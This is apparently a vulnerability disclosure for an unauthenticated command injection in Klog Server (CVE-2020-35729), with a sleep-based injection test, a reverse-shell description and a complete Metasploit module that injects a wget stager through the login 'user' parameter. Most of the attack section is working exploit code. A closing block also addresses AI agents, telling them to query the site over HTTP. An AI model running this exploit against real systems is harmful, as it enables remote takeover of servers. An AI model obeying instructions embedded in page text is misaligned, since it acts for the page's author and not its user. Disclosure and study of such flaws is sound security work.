# KLOG Server Unauthenticated Command Injection (CVE-2020-35729)

![](/files/-MQBNvJw2sCEX63mnJul)

As you can see in the code line above , the user input received without any filtering in the login panel is running on the server.The purpose of code line is fail login user save on ‘log.sh’ file found in the path /klog/www/config/scripts/ .Shown below see log.sh source codes.

![](/files/-MQBO2u6KtmhA4KZS35N)

Where ‘logmsg’ variable holds the user value in here and Var / log / klog / 127.0.0.1 / kaudit.log file is saved as in the code. This situation cause be command injection vulnerability.

###                    VULNERABILITY DETECTION AND EXPLOTATION

In the first step “%26sleep+5%26” payload’s has been sent and it is provided to run on target klog server .This situation Burpsuite is shown below in the screenshot.

![](/files/-MQBOI2r4571Ff9e9aGN)

Then, in order to automate the reverse shell connection on the server, the exploit shown in the screenshot below, was run and the shell operation was successfully performed in the listening NC connection.

![](/files/-MQBOM24dEhdTfJCIXEj)

{% embed url="<https://www.exploit-db.com/exploits/49366>" %}

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
                      'Name'           => 'Klog Server Unauthenticated Command Injection Vulnerability',
                      'Description'    => %q{
                        This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
                        "user" parameter is executed via shell_exec() function without input validation.
                      },
                      'License'        => MSF_LICENSE,
                      'Author'         =>
                        [ 'B3KC4T', # Vulnerability discovery
                          'Metin Yunus Kandemir',  # Metasploit module
                        ],
                      'References'     =>
                        [
                          ['CVE', '2020-35729'],
                          ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
                        ],

                      'DefaultOptions' =>
                        {
                          'HttpClientTimeout' => 2,
                        },
                      'Platform'       => [ 'unix', 'linux' ],
                      'Arch'           => [ ARCH_X64 ],
                      'Targets'        => [
                        ['Klog Server 2.4.1 (x64)', {
                          'Platform'    => 'linux',
                          'Arch'        => ARCH_X64,
                        }],
                      ],
                      'Privileged'      => false,
                      'DisclosureDate' => "2021-01-05",
                      'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
      ]
    )
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')

  end

  def execute_command(cmd, opts = {})
    command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"

    print_status("Sending stager payload...")
    uri = target_uri.path
    res= send_request_cgi({
                            'method'        => 'POST',
                            'uri'           => normalize_uri(uri, 'actions', 'authenticate.php'),
                            'encode_params' => false,
                            'vars_post'      => {
                              'user' => command_payload,
                              'pswd' => "inline"
                            }
                          })
    if res && res.code == 302
      print_error("The target is not vulnerable!")
    else
      print_good("The target is vulnerable!")
    end
  end

  def check
    uri = target_uri.path
    res= send_request_cgi({
                            'method'        => 'POST',
                            'uri'           => normalize_uri(uri, 'actions', 'authenticate.php'),
                            'encode_params' => false,
                            'vars_post'      => {
                              'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
                              'pswd' => "inline"
                            }
                          })
    if res && res.code == 302
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Vulnerable
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 10)
  end
end

```

![](/files/-MRtis-PuWuWCO-AqNiN)

{% embed url="<https://www.exploit-db.com/exploits/49474>" %}

<pre><code><strong># Author: Mustafa Gündoğdu - b3kc4t
</strong></code></pre>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.